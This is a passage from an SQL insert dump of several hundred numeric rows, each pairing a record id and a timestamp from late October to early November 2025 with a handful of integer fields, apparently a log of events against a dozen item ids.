(21423, '2025-10-26 13:15:58', 1, 2064, 0, 1, 1),
(21424, '2025-10-26 15:25:55', 1, 2061, 0, 1, 1),
(21425, '2025-10-26 16:02:16', 1, 2064, 0, 1, 1),
(21426, '2025-10-26 16:03:37', 1, 2064, 0, 1, 1),
(21427, '2025-10-26 16:03:45', 1, 2064, 0, 1, 1),
(21428, '2025-10-26 16:36:22', 1, 2064, 0, 1, 1),
(21429, '2025-10-26 16:39:02', 1, 2060, 0, 1, 1),
(21430, '2025-10-26 16:48:01', 1, 2059, 0, 1, 1),
(21431, '2025-10-26 16:58:08', 1, 2058, 0, 1, 1),
(21432, '2025-10-26 17:37:44', 1, 2064, 0, 1, 1),
(21433, '2025-10-26 17:56:01', 1, 2058, 0, 1, 1),
(21434, '2025-10-26 18:28:04', 1, 2054, 0, 1, 1),
(21435, '2025-10-26 19:32:27', 1, 2060, 0, 1, 1),
(21436, '2025-10-26 20:18:45', 1, 2054, 0, 1, 1),
(21437, '2025-10-26 21:49:04', 1, 2054, 0, 1, 1),
(21438, '2025-10-26 22:19:14', 1, 2060, 0, 1, 1),
(21439, '2025-10-27 00:10:07', 1, 2058, 0, 1, 1),
(21440, '2025-10-27 00:37:26', 1, 2064, 0, 1, 1),
(21441, '2025-10-27 01:40:26', 1, 2055, 0, 1, 1),
(21442, '2025-10-27 01:59:55', 1, 2063, 0, 1, 1),
(21443, '2025-10-27 03:33:05', 1, 2060, 0, 1, 1),
(21444, '2025-10-27 04:29:05', 1, 2064, 0, 1, 1),
(21445, '2025-10-27 04:54:31', 1, 2061, 0, 1, 1),
(21446, '2025-10-27 05:05:38', 1, 2054, 0, 1, 1),
(21447, '2025-10-27 05:44:07', 1, 2053, 0, 1, 1),
(21448, '2025-10-27 06:10:34', 1, 2054, 0, 1, 1),
(21449, '2025-10-27 06:14:51', 1, 2060, 0, 1, 1),
(21450, '2025-10-27 06:27:57', 1, 2062, 0, 1, 1),
(21451, '2025-10-27 06:43:16', 1, 2059, 0, 1, 1),
(21452, '2025-10-27 07:35:11', 1, 2054, 0, 1, 1),
(21453, '2025-10-27 07:50:04', 1, 2064, 0, 1, 1),
(21454, '2025-10-27 08:21:23', 1, 2060, 0, 1, 1),
(21455, '2025-10-27 08:23:16', 1, 2064, 0, 1, 1),
(21456, '2025-10-27 10:35:59', 1, 2055, 0, 1, 1),
(21457, '2025-10-27 14:13:05', 1, 2054, 0, 1, 1),
(21458, '2025-10-27 14:33:47', 1, 2059, 0, 1, 1),
(21459, '2025-10-27 14:49:59', 1, 2064, 0, 1, 1),
(21460, '2025-10-27 16:02:46', 1, 2055, 0, 1, 1),
(21461, '2025-10-27 16:16:36', 1, 2064, 0, 1, 1),
(21462, '2025-10-27 16:19:41', 1, 2059, 0, 1, 1),
(21463, '2025-10-27 16:20:49', 1, 2058, 0, 1, 1),
(21464, '2025-10-27 16:20:49', 1, 2054, 0, 1, 1),
(21465, '2025-10-27 16:22:20', 1, 2061, 0, 1, 1),
(21466, '2025-10-27 16:22:20', 1, 2062, 0, 1, 1),
(21467, '2025-10-27 16:29:15', 1, 2060, 0, 1, 1),
(21468, '2025-10-27 16:48:40', 1, 2064, 0, 1, 1),
(21469, '2025-10-27 17:07:09', 1, 2062, 0, 1, 1),
(21470, '2025-10-27 17:41:30', 1, 2064, 0, 1, 1),
(21471, '2025-10-27 18:03:22', 1, 2060, 0, 1, 1),
(21472, '2025-10-27 18:07:48', 1, 2062, 0, 1, 1),
(21473, '2025-10-27 19:01:30', 1, 2060, 0, 1, 1),
(21474, '2025-10-27 19:43:46', 1, 2054, 0, 1, 1),
(21475, '2025-10-27 19:43:49', 1, 2058, 0, 1, 1),
(21476, '2025-10-27 21:58:10', 1, 2060, 0, 1, 1),
(21477, '2025-10-27 23:16:49', 1, 2060, 0, 1, 1),
(21478, '2025-10-27 23:58:08', 1, 2064, 0, 1, 1),
(21479, '2025-10-28 00:01:33', 1, 2058, 0, 1, 1),
(21480, '2025-10-28 01:44:04', 1, 2055, 0, 1, 1),
(21481, '2025-10-28 02:01:50', 1, 2063, 0, 1, 1),
(21482, '2025-10-28 02:46:11', 1, 2054, 0, 1, 1),
(21483, '2025-10-28 03:58:23', 1, 2060, 0, 1, 1),
(21484, '2025-10-28 04:52:12', 1, 2061, 0, 1, 1),
(21485, '2025-10-28 05:07:05', 1, 2054, 0, 1, 1),
(21486, '2025-10-28 05:20:34', 1, 2054, 0, 1, 1),
(21487, '2025-10-28 06:03:35', 1, 2053, 0, 1, 1),
(21488, '2025-10-28 06:29:00', 1, 2062, 0, 1, 1),
(21489, '2025-10-28 06:52:10', 1, 2059, 0, 1, 1),
(21490, '2025-10-28 07:16:42', 1, 2064, 0, 1, 1),
(21491, '2025-10-28 07:51:25', 1, 2058, 0, 1, 1),
(21492, '2025-10-28 07:51:25', 1, 2060, 0, 1, 1),
(21493, '2025-10-28 12:03:19', 1, 2059, 0, 1, 1),
(21494, '2025-10-28 12:45:04', 1, 2064, 0, 1, 1),
(21495, '2025-10-28 14:14:05', 1, 2060, 0, 1, 1),
(21496, '2025-10-28 14:15:01', 1, 2060, 0, 1, 1),
(21497, '2025-10-28 19:16:25', 1, 2060, 0, 1, 1),
(21498, '2025-10-28 20:05:46', 1, 2059, 0, 1, 1),
(21499, '2025-10-28 20:07:52', 1, 2054, 0, 1, 1),
(21500, '2025-10-28 21:01:48', 1, 2064, 0, 1, 1),
(21501, '2025-10-28 21:36:47', 1, 2063, 0, 1, 1),
(21502, '2025-10-28 22:36:21', 1, 2061, 0, 1, 1),
(21503, '2025-10-28 22:54:03', 1, 2062, 0, 1, 1),
(21504, '2025-10-29 00:43:27', 1, 2054, 0, 1, 1),
(21505, '2025-10-29 00:51:20', 1, 2055, 0, 1, 1),
(21506, '2025-10-29 00:58:29', 1, 2064, 0, 1, 1),
(21507, '2025-10-29 02:07:22', 1, 2054, 0, 1, 1),
(21508, '2025-10-29 03:50:15', 1, 2064, 0, 1, 1),
(21509, '2025-10-29 05:56:01', 1, 2064, 0, 1, 1),
(21510, '2025-10-29 07:26:15', 1, 2053, 0, 1, 1),
(21511, '2025-10-29 08:07:55', 1, 2054, 0, 1, 1),
(21512, '2025-10-29 08:32:38', 1, 2060, 0, 1, 1),
(21513, '2025-10-29 10:43:50', 1, 2063, 0, 1, 1),
(21514, '2025-10-29 12:19:03', 1, 2054, 0, 1, 1),
(21515, '2025-10-29 13:04:14', 1, 2058, 0, 1, 1),
(21516, '2025-10-29 13:36:32', 1, 2064, 0, 1, 1),
(21517, '2025-10-29 14:31:39', 1, 2064, 0, 1, 1),
(21518, '2025-10-29 14:34:15', 1, 2060, 0, 1, 1),
(21519, '2025-10-29 16:20:31', 1, 2060, 0, 1, 1),
(21520, '2025-10-29 16:51:21', 1, 2063, 0, 1, 1),
(21521, '2025-10-29 18:03:18', 1, 2064, 0, 1, 1),
(21522, '2025-10-29 18:53:34', 1, 2058, 0, 1, 1),
(21523, '2025-10-29 20:07:07', 1, 2062, 0, 1, 1),
(21524, '2025-10-29 22:15:29', 1, 2060, 0, 1, 1),
(21525, '2025-10-29 23:23:30', 1, 2061, 0, 1, 1),
(21526, '2025-10-29 23:47:44', 1, 2062, 0, 1, 1),
(21527, '2025-10-29 23:48:14', 1, 2061, 0, 1, 1),
(21528, '2025-10-29 23:48:28', 1, 2058, 0, 1, 1),
(21529, '2025-10-29 23:48:41', 1, 2060, 0, 1, 1),
(21530, '2025-10-29 23:48:55', 1, 2064, 0, 1, 1),
(21531, '2025-10-29 23:49:09', 1, 2063, 0, 1, 1),
(21532, '2025-10-29 23:49:37', 1, 2059, 0, 1, 1),
(21533, '2025-10-29 23:50:05', 1, 2054, 0, 1, 1),
(21534, '2025-10-29 23:51:47', 1, 2055, 0, 1, 1),
(21535, '2025-10-29 23:53:15', 1, 2053, 0, 1, 1),
(21536, '2025-10-30 01:53:13', 1, 2053, 0, 1, 1),
(21537, '2025-10-30 05:16:35', 1, 2055, 0, 1, 1),
(21538, '2025-10-30 05:34:01', 1, 2054, 0, 1, 1),
(21539, '2025-10-30 05:34:39', 1, 2060, 0, 1, 1),
(21540, '2025-10-30 05:51:15', 1, 2054, 0, 1, 1),
(21541, '2025-10-30 07:00:14', 1, 2064, 0, 1, 1),
(21542, '2025-10-30 08:18:53', 1, 2062, 0, 1, 1),
(21543, '2025-10-30 08:27:24', 1, 2054, 0, 1, 1),
(21544, '2025-10-30 08:56:28', 1, 2064, 0, 1, 1),
(21545, '2025-10-30 11:06:24', 1, 2053, 0, 1, 1),
(21546, '2025-10-30 11:35:54', 1, 2063, 0, 1, 1),
(21547, '2025-10-30 11:51:19', 1, 2054, 0, 1, 1),
(21548, '2025-10-30 13:41:11', 1, 2064, 0, 1, 1),
(21549, '2025-10-30 15:10:00', 1, 2064, 0, 1, 1),
(21550, '2025-10-30 15:18:12', 1, 2060, 0, 1, 1),
(21551, '2025-10-30 15:29:57', 1, 2059, 0, 1, 1),
(21552, '2025-10-30 15:39:23', 1, 2055, 0, 1, 1),
(21553, '2025-10-30 16:40:38', 1, 2055, 0, 1, 1),
(21554, '2025-10-30 16:49:57', 1, 2058, 0, 1, 1),
(21555, '2025-10-30 17:22:51', 1, 2054, 0, 1, 1),
(21556, '2025-10-30 17:31:50', 1, 2064, 0, 1, 1),
(21557, '2025-10-30 18:02:29', 1, 2059, 0, 1, 1),
(21558, '2025-10-30 19:52:28', 1, 2053, 0, 1, 1),
(21559, '2025-10-30 20:16:41', 1, 2054, 0, 1, 1),
(21560, '2025-10-30 20:41:59', 1, 2064, 0, 1, 1),
(21561, '2025-10-30 22:39:56', 1, 2062, 0, 1, 1),
(21562, '2025-10-30 22:39:58', 1, 2063, 0, 1, 1),
(21563, '2025-10-30 22:40:07', 1, 2061, 0, 1, 1),
(21564, '2025-10-30 22:43:49', 1, 2059, 0, 1, 1),
(21565, '2025-10-30 23:01:53', 1, 2060, 0, 1, 1),
(21566, '2025-10-31 00:03:00', 1, 2060, 0, 1, 1),
(21567, '2025-10-31 03:06:51', 1, 2059, 0, 1, 1),
(21568, '2025-10-31 04:47:35', 1, 2063, 0, 1, 1),
(21569, '2025-10-31 05:55:14', 1, 2054, 0, 1, 1),
(21570, '2025-10-31 06:20:49', 1, 2063, 0, 1, 1),
(21571, '2025-10-31 06:31:51', 1, 2061, 0, 1, 1),
(21572, '2025-10-31 07:35:33', 1, 2064, 0, 1, 1),
(21573, '2025-10-31 07:35:48', 1, 2060, 0, 1, 1),
(21574, '2025-10-31 07:36:00', 1, 2058, 0, 1, 1),
(21575, '2025-10-31 07:36:29', 1, 2063, 0, 1, 1),
(21576, '2025-10-31 07:36:35', 1, 2061, 0, 1, 1),
(21577, '2025-10-31 07:37:22', 1, 2055, 0, 1, 1),
(21578, '2025-10-31 07:37:31', 1, 2062, 0, 1, 1),
(21579, '2025-10-31 07:38:01', 1, 2059, 0, 1, 1),
(21580, '2025-10-31 07:38:15', 1, 2054, 0, 1, 1),
(21581, '2025-10-31 07:43:43', 1, 2062, 0, 1, 1),
(21582, '2025-10-31 08:10:09', 1, 2060, 0, 1, 1),
(21583, '2025-10-31 11:41:17', 1, 2062, 0, 1, 1),
(21584, '2025-10-31 11:43:52', 1, 2064, 0, 1, 1),
(21585, '2025-10-31 13:49:21', 1, 2064, 0, 1, 1),
(21586, '2025-10-31 14:02:34', 1, 2061, 0, 1, 1),
(21587, '2025-10-31 15:16:11', 1, 2064, 0, 1, 1),
(21588, '2025-10-31 16:52:22', 1, 2060, 0, 1, 1),
(21589, '2025-10-31 17:41:59', 1, 2060, 0, 1, 1),
(21590, '2025-10-31 17:51:44', 1, 2063, 0, 1, 1),
(21591, '2025-10-31 18:19:32', 1, 2064, 0, 1, 1),
(21592, '2025-10-31 18:48:35', 1, 2061, 0, 1, 1),
(21593, '2025-10-31 19:26:24', 1, 2054, 0, 1, 1),
(21594, '2025-10-31 19:34:51', 1, 2060, 0, 1, 1),
(21595, '2025-10-31 19:55:06', 1, 2054, 0, 1, 1),
(21596, '2025-10-31 21:06:47', 1, 2063, 0, 1, 1),
(21597, '2025-10-31 21:41:25', 1, 2061, 0, 1, 1),
(21598, '2025-10-31 22:48:42', 1, 2059, 0, 1, 1),
(21599, '2025-10-31 23:15:33', 1, 2062, 0, 1, 1),
(21600, '2025-11-01 00:40:16', 1, 2060, 0, 1, 1),
(21601, '2025-11-01 01:07:21', 1, 2054, 0, 1, 1),
(21602, '2025-11-01 01:35:52', 1, 2060, 0, 1, 1),
(21603, '2025-11-01 03:43:37', 1, 2058, 0, 1, 1),
(21604, '2025-11-01 03:55:23', 1, 2064, 0, 1, 1),
(21605, '2025-11-01 04:04:56', 1, 2059, 0, 1, 1),
(21606, '2025-11-01 04:24:48', 1, 2062, 0, 1, 1),
(21607, '2025-11-01 04:35:08', 1, 2058, 0, 1, 1),
(21608, '2025-11-01 04:45:58', 1, 2055, 0, 1, 1),
(21609, '2025-11-01 05:16:31', 1, 2064, 0, 1, 1),
(21610, '2025-11-01 07:27:35', 1, 2058, 0, 1, 1),
(21611, '2025-11-01 09:28:06', 1, 2054, 0, 1, 1),
(21612, '2025-11-01 09:34:03', 1, 2058, 0, 1, 1),
(21613, '2025-11-01 09:37:00', 1, 2060, 0, 1, 1),
(21614, '2025-11-01 10:07:09', 1, 2064, 0, 1, 1),
(21615, '2025-11-01 10:17:43', 1, 2063, 0, 1, 1),
(21616, '2025-11-01 11:37:47', 1, 2060, 0, 1, 1),
(21617, '2025-11-01 12:04:57', 1, 2055, 0, 1, 1),
(21618, '2025-11-01 12:05:32', 1, 2058, 0, 1, 1),
(21619, '2025-11-01 12:18:59', 1, 2054, 0, 1, 1),
(21620, '2025-11-01 13:46:20', 1, 2064, 4063, 1, 1),
(21621, '2025-11-01 15:06:27', 1, 2064, 0, 1, 1),
(21622, '2025-11-01 15:40:13', 1, 2060, 0, 1, 1),
(21623, '2025-11-01 18:16:32', 1, 2059, 0, 1, 1),
(21624, '2025-11-01 18:18:48', 1, 2064, 0, 1, 1),
(21625, '2025-11-01 18:30:11', 1, 2064, 0, 1, 1),
(21626, '2025-11-01 19:01:00', 1, 2053, 0, 1, 1),
(21627, '2025-11-01 19:47:28', 1, 2061, 0, 1, 1),
(21628, '2025-11-01 22:34:23', 1, 2054, 0, 1, 1),
(21629, '2025-11-01 22:49:24', 1, 2064, 0, 1, 1),
(21630, '2025-11-02 01:28:50', 1, 2058, 0, 1, 1),
(21631, '2025-11-02 01:48:16', 1, 2054, 0, 1, 1),
(21632, '2025-11-02 02:56:41', 1, 2062, 0, 1, 1),
(21633, '2025-11-02 03:07:17', 1, 2063, 0, 1, 1),
(21634, '2025-11-02 05:31:27', 1, 2064, 0, 1, 1),
(21635, '2025-11-02 06:42:48', 1, 2060, 0, 1, 1),
(21636, '2025-11-02 06:42:53', 1, 2059, 0, 1, 1),
(21637, '2025-11-02 09:07:50', 1, 2062, 0, 1, 1),
(21638, '2025-11-02 11:54:47', 1, 2053, 0, 1, 1),
(21639, '2025-11-02 12:08:04', 1, 2054, 0, 1, 1),
(21640, '2025-11-02 13:26:44', 1, 2064, 0, 1, 1),
(21641, '2025-11-02 13:54:09', 1, 2060, 0, 1, 1),
(21642, '2025-11-02 14:31:02', 1, 2059, 0, 1, 1),
(21643, '2025-11-02 15:57:32', 1, 2064, 0, 1, 1),
(21644, '2025-11-02 16:44:07', 1, 2064, 0, 1, 1),
(21645, '2025-11-02 18:10:27', 1, 2054, 0, 1, 1),
(21646, '2025-11-02 18:46:01', 1, 2062, 0, 1, 1),
(21647, '2025-11-02 18:56:59', 1, 2060, 0, 1, 1),
(21648, '2025-11-02 20:31:59', 1, 2054, 0, 1, 1),
(21649, '2025-11-02 21:18:46', 1, 2064, 0, 1, 1),
(21650, '2025-11-02 21:36:12', 1, 2060, 0, 1, 1),
(21651, '2025-11-02 21:43:00', 1, 2054, 0, 1, 1),
(21652, '2025-11-02 23:42:04', 1, 2063, 0, 1, 1),
(21653, '2025-11-03 00:02:51', 1, 2059, 0, 1, 1),
(21654, '2025-11-03 00:14:23', 1, 2054, 0, 1, 1),
(21655, '2025-11-03 01:11:13', 1, 2055, 0, 1, 1),
(21656, '2025-11-03 07:14:22', 1, 2055, 0, 1, 1),
(21657, '2025-11-03 08:43:08', 1, 2060, 0, 1, 1),
(21658, '2025-11-03 08:46:01', 1, 2063, 0, 1, 1),
(21659, '2025-11-03 08:56:43', 1, 2054, 0, 1, 1),
(21660, '2025-11-03 09:32:27', 1, 2059, 0, 1, 1),
(21661, '2025-11-03 09:32:27', 1, 2061, 0, 1, 1),
(21662, '2025-11-03 09:32:34', 1, 2064, 0, 1, 1),
(21663, '2025-11-03 09:32:34', 1, 2064, 0, 1, 1),
(21664, '2025-11-03 09:32:34', 1, 2063, 0, 1, 1),
(21665, '2025-11-03 09:32:34', 1, 2064, 0, 1, 1),
(21666, '2025-11-03 09:32:35', 1, 2060, 0, 1, 1),
(21667, '2025-11-03 09:32:36', 1, 2054, 0, 1, 1),
(21668, '2025-11-03 09:32:37', 1, 2054, 0, 1, 1),
(21669, '2025-11-03 09:32:37', 1, 2059, 0, 1, 1),
(21670, '2025-11-03 09:32:37', 1, 2053, 0, 1, 1),
(21671, '2025-11-03 09:32:37', 1, 2058, 0, 1, 1),
(21672, '2025-11-03 09:32:41', 1, 2062, 0, 1, 1),
(21673, '2025-11-03 09:32:41', 1, 2061, 0, 1, 1),
(21674, '2025-11-03 09:32:41', 1, 2061, 0, 1, 1),
(21675, '2025-11-03 09:32:41', 1, 2055, 0, 1, 1),
(21676, '2025-11-03 09:32:42', 1, 2058, 0, 1, 1),
(21677, '2025-11-03 09:32:44', 1, 2059, 0, 1, 1),
(21678, '2025-11-03 09:32:44', 1, 2059, 0, 1, 1),
(21679, '2025-11-03 09:32:44', 1, 2059, 0, 1, 1),
(21680, '2025-11-03 09:32:44', 1, 2059, 0, 1, 1),
(21681, '2025-11-03 09:32:44', 1, 2059, 0, 1, 1),
(21682, '2025-11-03 09:32:45', 1, 2059, 0, 1, 1),
(21683, '2025-11-03 09:32:45', 1, 2059, 0, 1, 1),
(21684, '2025-11-03 09:32:45', 1, 2059, 0, 1, 1),
(21685, '2025-11-03 09:32:45', 1, 2059, 0, 1, 1),
(21686, '2025-11-03 09:32:46', 1, 2054, 0, 1, 1),
(21687, '2025-11-03 09:32:47', 1, 2058, 0, 1, 1),
(21688, '2025-11-03 09:32:48', 1, 2064, 0, 1, 1),
(21689, '2025-11-03 09:32:48', 1, 2064, 0, 1, 1),
(21690, '2025-11-03 09:32:49', 1, 2061, 0, 1, 1),
(21691, '2025-11-03 09:32:49', 1, 2064, 0, 1, 1),
(21692, '2025-11-03 09:32:49', 1, 2063, 0, 1, 1),
(21693, '2025-11-03 09:32:49', 1, 2064, 0, 1, 1),
(21694, '2025-11-03 09:32:49', 1, 2061, 0, 1, 1),
(21695, '2025-11-03 09:32:50', 1, 2063, 0, 1, 1),
(21696, '2025-11-03 09:32:50', 1, 2054, 0, 1, 1),
(21697, '2025-11-03 09:32:50', 1, 2055, 0, 1, 1),
(21698, '2025-11-03 09:32:51', 1, 2058, 0, 1, 1),
(21699, '2025-11-03 09:32:51', 1, 2060, 0, 1, 1),
(21700, '2025-11-03 09:32:52', 1, 2059, 0, 1, 1),
(21701, '2025-11-03 09:32:52', 1, 2059, 0, 1, 1),
(21702, '2025-11-03 09:32:52', 1, 2059, 0, 1, 1),
(21703, '2025-11-03 09:32:52', 1, 2059, 0, 1, 1),
(21704, '2025-11-03 09:32:53', 1, 2059, 0, 1, 1),
(21705, '2025-11-03 09:32:53', 1, 2059, 0, 1, 1),
(21706, '2025-11-03 09:32:53', 1, 2059, 0, 1, 1),
(21707, '2025-11-03 09:32:53', 1, 2059, 0, 1, 1),
(21708, '2025-11-03 09:32:54', 1, 2063, 0, 1, 1),
(21709, '2025-11-03 09:32:55', 1, 2062, 0, 1, 1),
(21710, '2025-11-03 09:32:55', 1, 2053, 0, 1, 1),
(21711, '2025-11-03 09:32:55', 1, 2059, 0, 1, 1),
(21712, '2025-11-03 09:32:55', 1, 2064, 0, 1, 1),
(21713, '2025-11-03 09:32:55', 1, 2064, 0, 1, 1),
(21714, '2025-11-03 09:32:57', 1, 2055, 0, 1, 1),
(21715, '2025-11-03 09:32:57', 1, 2058, 0, 1, 1),
(21716, '2025-11-03 09:32:57', 1, 2060, 0, 1, 1),
(21717, '2025-11-03 09:32:59', 1, 2061, 0, 1, 1),
(21718, '2025-11-03 09:32:59', 1, 2054, 0, 1, 1),
(21719, '2025-11-03 09:33:01', 1, 2053, 0, 1, 1),
(21720, '2025-11-03 09:33:02', 1, 2053, 0, 1, 1),
(21721, '2025-11-03 09:33:03', 1, 2053, 0, 1, 1),
(21722, '2025-11-03 09:33:04', 1, 2053, 0, 1, 1),
(21723, '2025-11-03 09:33:10', 1, 2053, 0, 1, 1),
(21724, '2025-11-03 09:33:11', 1, 2053, 0, 1, 1),
(21725, '2025-11-03 09:33:11', 1, 2053, 0, 1, 1),
(21726, '2025-11-03 09:33:11', 1, 2053, 0, 1, 1),
(21727, '2025-11-03 09:33:11', 1, 2053, 0, 1, 1),
(21728, '2025-11-03 09:33:12', 1, 2053, 0, 1, 1),
(21729, '2025-11-03 09:33:15', 1, 2053, 0, 1, 1),
(21730, '2025-11-03 09:33:15', 1, 2053, 0, 1, 1),
(21731, '2025-11-03 09:33:15', 1, 2053, 0, 1, 1),
(21732, '2025-11-03 09:33:15', 1, 2053, 0, 1, 1),
(21733, '2025-11-03 09:33:15', 1, 2053, 0, 1, 1),
(21734, '2025-11-03 09:33:15', 1, 2053, 0, 1, 1),
(21735, '2025-11-03 09:33:20', 1, 2053, 0, 1, 1),
(21736, '2025-11-03 09:33:20', 1, 2053, 0, 1, 1),
(21737, '2025-11-03 09:33:20', 1, 2053, 0, 1, 1),
(21738, '2025-11-03 09:33:20', 1, 2053, 0, 1, 1),
(21739, '2025-11-03 09:33:20', 1, 2053, 0, 1, 1),
(21740, '2025-11-03 09:33:20', 1, 2053, 0, 1, 1),
(21741, '2025-11-03 09:33:21', 1, 2053, 0, 1, 1),
(21742, '2025-11-03 09:33:28', 1, 2053, 0, 1, 1),
(21743, '2025-11-03 09:33:33', 1, 2053, 0, 1, 1),
(21744, '2025-11-03 12:41:28', 1, 2054, 0, 1, 1),
(21745, '2025-11-03 13:33:50', 1, 2064, 0, 1, 1),
(21746, '2025-11-03 13:33:55', 1, 2062, 0, 1, 1),
(21747, '2025-11-03 13:33:59', 1, 2063, 0, 1, 1),
(21748, '2025-11-03 13:34:04', 1, 2061, 0, 1, 1),
(21749, '2025-11-03 13:34:10', 1, 2059, 0, 1, 1),
(21750, '2025-11-03 13:34:14', 1, 2058, 0, 1, 1),
(21751, '2025-11-03 13:34:19', 1, 2055, 0, 1, 1),
(21752, '2025-11-03 13:34:24', 1, 2054, 0, 1, 1),
(21753, '2025-11-03 13:34:28', 1, 2060, 0, 1, 1),
(21754, '2025-11-03 14:34:45', 1, 2064, 0, 1, 1),
(21755, '2025-11-03 15:28:50', 1, 2053, 0, 1, 1),
(21756, '2025-11-03 15:35:19', 1, 2059, 0, 1, 1),
(21757, '2025-11-03 16:06:33', 1, 2064, 0, 1, 1),
(21758, '2025-11-03 16:56:41', 1, 2060, 0, 1, 1),
(21759, '2025-11-03 18:53:28', 1, 2059, 0, 1, 1),
(21760, '2025-11-03 19:51:15', 1, 2054, 0, 1, 1),
(21761, '2025-11-03 19:58:35', 1, 2058, 0, 1, 1),
(21762, '2025-11-03 20:53:15', 1, 2061, 0, 1, 1),
(21763, '2025-11-03 22:16:52', 1, 2064, 0, 1, 1),
(21764, '2025-11-03 22:17:02', 1, 2059, 0, 1, 1),
(21765, '2025-11-03 22:17:12', 1, 2060, 0, 1, 1),
(21766, '2025-11-03 22:17:22', 1, 2063, 0, 1, 1),
(21767, '2025-11-03 22:21:02', 1, 2061, 0, 1, 1),
(21768, '2025-11-03 22:25:57', 1, 2054, 0, 1, 1),
(21769, '2025-11-03 22:29:47', 1, 2062, 0, 1, 1),
(21770, '2025-11-03 22:54:57', 1, 2055, 0, 1, 1),
(21771, '2025-11-03 22:57:27', 1, 2053, 0, 1, 1),
(21772, '2025-11-03 23:03:47', 1, 2058, 0, 1, 1),
(21773, '2025-11-04 03:05:56', 1, 2060, 0, 1, 1),
(21774, '2025-11-04 03:16:53', 1, 2064, 0, 1, 1),
(21775, '2025-11-04 04:05:10', 1, 2054, 0, 1, 1),
(21776, '2025-11-04 07:58:51', 1, 2064, 0, 1, 1),
(21777, '2025-11-04 08:39:13', 1, 2060, 0, 1, 1),
(21778, '2025-11-04 09:16:11', 1, 2055, 0, 1, 1),
(21779, '2025-11-04 10:01:54', 1, 2064, 0, 1, 1),
(21780, '2025-11-04 10:28:00', 1, 2064, 0, 1, 1),
(21781, '2025-11-04 13:35:56', 1, 2060, 0, 1, 1),
(21782, '2025-11-04 14:55:55', 1, 2064, 0, 1, 1),
(21783, '2025-11-04 14:57:25', 1, 2064, 0, 1, 1),
(21784, '2025-11-04 16:02:19', 1, 2054, 0, 1, 1),
(21785, '2025-11-04 17:42:35', 1, 2060, 0, 1, 1),
(21786, '2025-11-04 17:56:46', 1, 2054, 0, 1, 1),
(21787, '2025-11-04 18:00:00', 1, 2062, 0, 1, 1),
(21788, '2025-11-04 18:35:54', 1, 2054, 0, 1, 1),
(21789, '2025-11-04 18:42:32', 1, 2064, 0, 1, 1),
(21790, '2025-11-04 19:57:08', 1, 2060, 0, 1, 1),
(21791, '2025-11-04 21:06:21', 1, 2061, 0, 1, 1),
(21792, '2025-11-05 02:49:09', 1, 2062, 0, 1, 1),
(21793, '2025-11-05 06:22:55', 1, 2061, 0, 1, 1),
(21794, '2025-11-05 09:35:13', 1, 2054, 0, 1, 1),
(21795, '2025-11-05 11:52:22', 1, 2060, 0, 1, 1),
(21796, '2025-11-05 13:01:56', 1, 2064, 0, 1, 1),
(21797, '2025-11-05 13:22:34', 1, 2060, 0, 1, 1),
(21798, '2025-11-05 13:22:49', 1, 2064, 0, 1, 1),
(21799, '2025-11-05 14:29:54', 1, 2064, 0, 1, 1),
(21800, '2025-11-05 15:18:24', 1, 2053, 0, 1, 1),
(21801, '2025-11-05 17:16:14', 1, 2064, 0, 1, 1),
(21802, '2025-11-05 19:01:10', 1, 2059, 0, 1, 1),
(21803, '2025-11-05 19:03:34', 1, 2058, 0, 1, 1),
(21804, '2025-11-05 19:15:12', 1, 2062, 0, 1, 1),
(21805, '2025-11-05 19:17:24', 1, 2063, 0, 1, 1),
(21806, '2025-11-05 19:26:41', 1, 2064, 0, 1, 1),
(21807, '2025-11-05 19:37:53', 1, 2063, 0, 1, 1),
(21808, '2025-11-05 20:14:35', 1, 2060, 0, 1, 1),
(21809, '2025-11-05 20:17:04', 1, 2054, 0, 1, 1),
(21810, '2025-11-05 20:43:24', 1, 2063, 0, 1, 1),
(21811, '2025-11-05 21:21:16', 1, 2064, 0, 1, 1),
(21812, '2025-11-05 21:46:49', 1, 2064, 0, 1, 1),
(21813, '2025-11-05 22:42:24', 1, 2060, 0, 1, 1),
(21814, '2025-11-06 00:26:16', 1, 2054, 0, 1, 1),
(21815, '2025-11-06 02:13:27', 1, 2053, 0, 1, 1),
(21816, '2025-11-06 04:28:59', 1, 2064, 0, 1, 1),
(21817, '2025-11-06 04:41:06', 1, 2059, 0, 1, 1),
(21818, '2025-11-06 04:49:52', 1, 2062, 0, 1, 1),
(21819, '2025-11-06 05:09:42', 1, 2058, 0, 1, 1),
(21820, '2025-11-06 05:20:28', 1, 2055, 0, 1, 1),
(21821, '2025-11-06 05:56:08', 1, 2053, 0, 1, 1),
(21822, '2025-11-06 06:18:28', 1, 2060, 0, 1, 1),
(21823, '2025-11-06 06:24:36', 1, 2063, 0, 1, 1),
(21824, '2025-11-06 06:41:10', 1, 2058, 0, 1, 1),
(21825, '2025-11-06 07:13:33', 1, 2055, 0, 1, 1),
(21826, '2025-11-06 08:06:18', 1, 2061, 0, 1, 1),
(21827, '2025-11-06 08:36:47', 1, 2062, 0, 1, 1),
(21828, '2025-11-06 09:20:19', 1, 2064, 0, 1, 1),
(21829, '2025-11-06 09:29:12', 1, 2054, 0, 1, 1),
(21830, '2025-11-06 09:39:21', 1, 2059, 0, 1, 1),
(21831, '2025-11-06 09:48:36', 1, 2064, 0, 1, 1),
(21832, '2025-11-06 10:03:24', 1, 2054, 0, 1, 1),
(21833, '2025-11-06 10:17:40', 1, 2054, 0, 1, 1),
(21834, '2025-11-06 11:31:44', 1, 2059, 0, 1, 1),
(21835, '2025-11-06 11:34:42', 1, 2055, 0, 1, 1),
(21836, '2025-11-06 11:45:41', 1, 2060, 0, 1, 1),
(21837, '2025-11-06 12:54:42', 1, 2064, 0, 1, 1),
(21838, '2025-11-06 13:36:20', 1, 2054, 0, 1, 1),
(21839, '2025-11-06 13:54:09', 1, 2060, 0, 1, 1),
(21840, '2025-11-06 13:54:11', 1, 2060, 0, 1, 1),
(21841, '2025-11-06 14:21:31', 1, 2058, 0, 1, 1),
(21842, '2025-11-06 15:38:26', 1, 2064, 0, 1, 1),
(21843, '2025-11-06 17:52:46', 1, 2059, 0, 1, 1),
(21844, '2025-11-06 18:24:38', 1, 2062, 0, 1, 1),
(21845, '2025-11-06 18:26:00', 1, 2064, 0, 1, 1),
(21846, '2025-11-06 19:00:54', 1, 2059, 0, 1, 1),
(21847, '2025-11-06 20:03:30', 1, 2064, 0, 1, 1),
(21848, '2025-11-06 20:36:05', 1, 2059, 0, 1, 1),
(21849, '2025-11-06 20:57:39', 1, 2060, 0, 1, 1),
(21850, '2025-11-06 20:58:07', 1, 2058, 0, 1, 1),
